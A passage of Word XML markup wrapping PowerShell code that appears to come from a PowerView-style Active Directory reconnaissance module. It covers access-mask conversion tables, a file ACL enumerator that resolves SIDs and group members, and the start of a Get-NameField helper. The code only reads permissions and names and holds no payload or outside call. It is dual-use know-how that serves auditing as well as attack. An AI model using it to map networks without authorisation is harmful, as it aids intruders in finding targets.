    <w:p w14:paraId="0430DF01" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">              [uint32]'0x00010000' = 'Delete'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E7D7AB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">              [uint32]'0x00000100' = 'WriteAttributes'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16499EB4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">              [uint32]'0x00000080' = 'ReadAttributes'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215A223B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">              [uint32]'0x00000040' = 'DeleteChild'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DFE5D0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">              [uint32]'0x00000020' = 'Execute/Traverse'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D800EC4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">              [uint32]'0x00000010' = 'WriteExtendedAttributes'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C34380" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">              [uint32]'0x00000008' = 'ReadExtendedAttributes'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02017E97" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">              [uint32]'0x00000004' = 'AppendData/AddSubdirectory'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E62085A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">              [uint32]'0x00000002' = 'WriteData/AddFile'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E71F97" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">              [uint32]'0x00000001' = 'ReadData/ListDirectory'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB3CBDA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA06EE4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4BCB150B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $SimplePermissions = @{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F31645" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">              [uint32]'0x1f01ff' = 'FullControl'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AA35A6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">              [uint32]'0x0301bf' = 'Modify'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD90051" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">              [uint32]'0x0200a9' = 'ReadAndExecute'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEDE330" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">              [uint32]'0x02019f' = 'ReadAndWrite'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70319861" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">              [uint32]'0x020089' = 'Read'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AFA977" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">              [uint32]'0x000116' = 'Write'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2305072F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F15E75" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="50C173D0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Permissions = @()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2884CD14" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="09BC3BEE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # get simple permission</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1553CDC4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Permissions += $SimplePermissions.Keys |  % {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B098370" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                              if (($FSR -band $_) -eq $_) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4704321C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                $SimplePermissions[$_]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07032E86" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                $FSR = $FSR -band (-not $_)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201C6FB2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                              }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF5CF29" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A194D61" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="17BA7B40" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # get remaining extended permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68170723" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Permissions += $AccessMask.Keys |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5679AF17" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            ? { $FSR -band $_ } |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153EFC58" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            % { $AccessMask[$_] }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C638088" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="00469C9B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            ($Permissions | ?{$_}) -join ","</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF28674" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061CE710" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD9074A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="29F95762" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    process {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9A189A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7BAEA927" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769C3BDE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $ACL = Get-Acl -Path $Path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B1B9D8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="57337998" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            $ACL.GetAccessRules($true,$true,[System.Security.Principal.SecurityIdentifier]) | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCCAC29" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="02F588F9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Names = @()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20947779" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if ($_.IdentityReference -match '^S-1-5-21-[0-9]+-[0-9]+-[0-9]+-[0-9]+') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB82D94" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $Object = Get-ADObject -SID $_.IdentityReference</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B988B2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $Names = @()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BDC6F2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $SIDs = @($Object.objectsid)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0985E0D3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="700EA6E3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    if ($Recurse -and (@('268435456','268435457','536870912','536870913') -contains $Object.samAccountType)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D25410E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $SIDs += Get-NetGroupMember -SID $Object.objectsid | Select-Object -ExpandProperty MemberSid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193DBA30" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701C7FE7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1063B12A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $SIDs | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B904FA1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $Names += ,@($_, (Convert-SidToName $_))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4BB63E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559B51CC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429DE0D1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC6865F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $Names += ,@($_.IdentityReference.Value, (Convert-SidToName $_.IdentityReference.Value))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041DB931" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035635A4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1D5487D5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                ForEach($Name in $Names) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEBB325" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $Out = New-Object PSObject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43447832" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $Out | Add-Member Noteproperty 'Path' $Path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C3E344" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $Out | Add-Member Noteproperty 'FileSystemRights' (Convert-FileRight -FSR $_.FileSystemRights.value__)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F27E05" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $Out | Add-Member Noteproperty 'IdentityReference' $Name[1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D9693F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                    $Out | Add-Member Noteproperty 'IdentitySID' $Name[0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA77127" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $Out | Add-Member Noteproperty 'AccessControlType' $_.AccessControlType</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BACA1C9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $Out</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C773D5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B3AE16" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762A578F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516DF36C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0220546C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Write-Warning $_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D537313" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75727073" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4250E6BC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B096FC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="759D0F78" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="25676B34" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>filter Get-NameField {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B886011" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DA2C2B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DD25BF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFDC5BC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Helper that attempts to extract appropriate field names from</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0197A3BA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        passed computer objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3170D5BC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="50C46BDB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6A9EBE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0758A9A8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The passed object to extract name fields from.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F714235" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6705E396" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER DnsHostName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F8E6E7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BF1DF5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        A DnsHostName to extract through ValueFromPipelineByPropertyName.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08ED2B61" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0DA5E6E2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309719E2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC8CC44" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        A Name to extract through ValueFromPipelineByPropertyName.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45512C63" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5620AA14" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E29B27C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="60B10421" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-NetComputer -FullData | Get-NameField</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F851F7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6D1A64" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9A47DF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC402CF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29ACC65F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Object]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6442F810" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Object,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78335793" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="64B39378" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ValueFromPipelineByPropertyName = $True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582D402E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B03F987" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DnsHostName,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4288A18F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0EAACBE9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ValueFromPipelineByPropertyName = $True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495D5EC5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E097D17" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D10A6CE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DC29AB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="43375046" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    if($PSBoundParameters['DnsHostName']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0F6E63" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DnsHostName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370AA774" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC6DEAA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    elseif($PSBoundParameters['Name']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E58EB37" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54444D15" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4E0FFE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    elseif($Object) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC87CA8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        if ( [bool]($Object.PSobject.Properties.name -match "dnshostname") ) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12631CC4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
